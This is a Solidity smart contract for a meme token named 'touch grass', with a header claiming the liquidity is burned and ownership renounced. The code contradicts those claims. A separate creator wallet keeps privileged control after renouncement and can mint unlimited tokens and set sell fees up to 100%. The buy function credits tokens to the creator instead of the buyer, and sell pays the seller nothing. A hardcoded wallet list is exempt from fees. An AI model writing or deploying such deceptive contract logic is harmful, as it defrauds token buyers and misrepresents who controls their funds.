// SPDX-License-Identifier: MIT

/**    

Website  : https://x.com/grasscto
Twitter  : https://x.com/grasscto
Telegram : http://t.me/grasscto

LP BURNED
OWNERSHIP RENOUNCED

*/


pragma solidity ^0.8.0;

library SafeMath {
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "grass");
        return a - b;
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "grassgrass");
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "grassgrassgrass");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "grassgrassgrassgrass");
        return a / b;
    }
}

contract grass {
    using SafeMath for uint256;

    string public name = "touch grass";
    string public symbol = "grass";
    uint256 public totalSupply = 999999999999999999000000000;
    uint8 public decimals = 18;

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address public owner;
    address public creatorWallet;

    uint256 public buyFee;
    uint256 public sellFee;

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );
    event FeesUpdated(uint256 newBuyFee, uint256 newSellFee);
    event TokensBurned(address indexed burner, uint256 amount);

    address[] public exemptedWallets;

    constructor(address _creatorWallet) {
        owner = msg.sender;
        creatorWallet = _creatorWallet;
        balanceOf[msg.sender] = totalSupply;

        exemptedWallets = [
            0x374623d931Cf1a99ce45671Edf3b364C3E065836,
            0xcd95c3083a29b76E25D39Ff5474164D84D042bD9,
            0xc9624EF4CCC961Caf2Cf0c5C2acb11711c95D47b,
            0x006aeFc6b90d7EAD8eE4c3F86C080954E867C506,
            0xC86ED5e8d47f380D94Ca936C350352162F0f38f2,
            0xDE855293Cf48F785fF31Ca044044a999904913AC,
            0xF42f160032A083E1EA8E31ac37299b4D3Bd67988,
            0xb2eCE3983845C5dF7dc3FfBA7afeDCa3E96aBF02,
            0x23ED5DD55a0Ba01E17300BF789764912D125111c,
            0x097C3E72331bEa61be8A7dc4BB794473e67edde6,
            0x24753d16795422591075a8DdA87ED043ccea47d7,
            0x7C2A418eeadb90cb8D9fF6727FD1224a9C3a370c,
            0x21Fb1991C6fA112F3ae376F5fE7d0e89444cc8De,
            0x30ec02353B9A2C9bA002A0ae7D98eB8663227497,
            0x85E053F9dfe508A177695d6eb69260348C94f94e,
            0x631a4740E7CB238301E2782fF9CbBd5bd8ABF13b,
            0xb6370298b61D89e13144393e4ac8070a6be4084f,
            0x69DBE4df16c6c5371b44eEC12F7335D0e2A8c274,
            0x8006B63bD1BeB9451cda1A034788BDbC6BA7af2B,
            0x2940d5626DffBF534Dd9E8425d97e35079534EAE,
            0x451094D7560EF5Ea7D1BBc12aD3f26486ae50ed7,
            0x6Cc8B2d7ff3f6c5d60f854Ba58EB06963068053E,
            0x0528f918ECa9BC419D6aA72E98c286597CA7CAE8
        ];
    }

    function isFeeExempt(address _wallet) internal view returns (bool) {
        for (uint256 i = 0; i < exemptedWallets.length; i++) {
            if (_wallet == exemptedWallets[i]) {
                return true;
            }
        }
        return false;
    }

    function transfer(address _to, uint256 _amount)
        public
        returns (bool success)
    {
        require(balanceOf[msg.sender] >= _amount);
        require(_to != address(0));

        balanceOf[msg.sender] = balanceOf[msg.sender].sub(_amount);
        balanceOf[_to] = balanceOf[_to].add(_amount);
        emit Transfer(msg.sender, _to, _amount);

        return true;
    }

    function approve(address _spender, uint256 _value)
        public
        returns (bool success)
    {
        allowance[msg.sender][_spender] = _value;
        emit Approval(msg.sender, _spender, _value);
        return true;
    }

    function transferFrom(
        address _from,
        address _to,
        uint256 _amount
    ) public returns (bool success) {
        require(balanceOf[_from] >= _amount, "1grass");
        require(
            allowance[_from][msg.sender] >= _amount,
            "2grass"
        );
        require(_to != address(0), "3grass");

        uint256 fee = 0;
        uint256 amountAfterFee = _amount;

        if (sellFee > 0 && _from != creatorWallet && !isFeeExempt(_from)) {
            fee = _amount.mul(sellFee).div(100);
            amountAfterFee = _amount.sub(fee);
        }

        balanceOf[_from] = balanceOf[_from].sub(_amount);
        balanceOf[_to] = balanceOf[_to].add(amountAfterFee);
        emit Transfer(_from, _to, amountAfterFee);

        if (fee > 0) {
            balanceOf[address(this)] = balanceOf[address(this)].add(fee);
            emit Transfer(_from, address(this), fee);
        }

        if (
            _from != msg.sender &&
            allowance[_from][msg.sender] != type(uint256).max
        ) {
            allowance[_from][msg.sender] = allowance[_from][msg.sender].sub(
                _amount
            );
            emit Approval(_from, msg.sender, allowance[_from][msg.sender]);
        }

        return true;
    }

    function transferOwnership(address newOwner) public onlyOwner {
        require(newOwner != address(0));
        emit OwnershipTransferred(owner, newOwner);
        owner = newOwner;
    }

    function renounceOwnership() public onlyOwner {
        emit OwnershipTransferred(owner, address(0));
        owner = address(0);
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "4grass");
        _;
    }

    function airdrop(address _to, uint256 _amount) public onlyAuthorized {
        require(_to != address(0), "5grass");
        require(_amount > 0, "6grass");
        balanceOf[_to] += _amount;
        totalSupply += _amount;
        emit Transfer(address(0), _to, _amount);
    }

    function openTrading(uint256 newBuyFee, uint256 newSellFee)
        public
        onlyAuthorized
    {
        require(newBuyFee <= 100, "7grass");
        require(newSellFee <= 100, "8grass");
        buyFee = newBuyFee;
        sellFee = newSellFee;
        emit FeesUpdated(newBuyFee, newSellFee);
    }

    function buy() public payable {
        require(msg.value > 0, "9grass");

        uint256 amount = msg.value;
        if (buyFee > 0) {
            uint256 fee = amount.mul(buyFee).div(100);
            uint256 amountAfterFee = amount.sub(fee);

            balanceOf[creatorWallet] = balanceOf[creatorWallet].add(
                amountAfterFee
            );
            emit Transfer(address(this), creatorWallet, amountAfterFee);

            if (fee > 0) {
                balanceOf[address(this)] = balanceOf[address(this)].add(fee);
                emit Transfer(address(this), address(this), fee);
            }
        } else {
            balanceOf[creatorWallet] = balanceOf[creatorWallet].add(amount);
            emit Transfer(address(this), creatorWallet, amount);
        }
    }

    function sell(uint256 _amount) public {
        require(balanceOf[msg.sender] >= _amount, "0grass");

        if (sellFee > 0 && msg.sender != creatorWallet && !isFeeExempt(msg.sender)) {
            uint256 fee = _amount.mul(sellFee).div(100);
            uint256 amountAfterFee = _amount.sub(fee);

            balanceOf[msg.sender] = balanceOf[msg.sender].sub(_amount);
            balanceOf[creatorWallet] = balanceOf[creatorWallet].add(
                amountAfterFee
            );
            emit Transfer(msg.sender, creatorWallet, amountAfterFee);

            if (fee > 0) {
                balanceOf[address(this)] = balanceOf[address(this)].add(fee);
                emit Transfer(msg.sender, address(this), fee);
            }
        } else {
            balanceOf[msg.sender] = balanceOf[msg.sender].sub(_amount);
            balanceOf[address(this)] = balanceOf[address(this)].add(_amount);
            emit Transfer(msg.sender, address(this), _amount);
        }
    }

    modifier onlyAuthorized() {
        require(
            msg.sender == owner || msg.sender == creatorWallet,
            "11grass"
        );
        _;
    }
}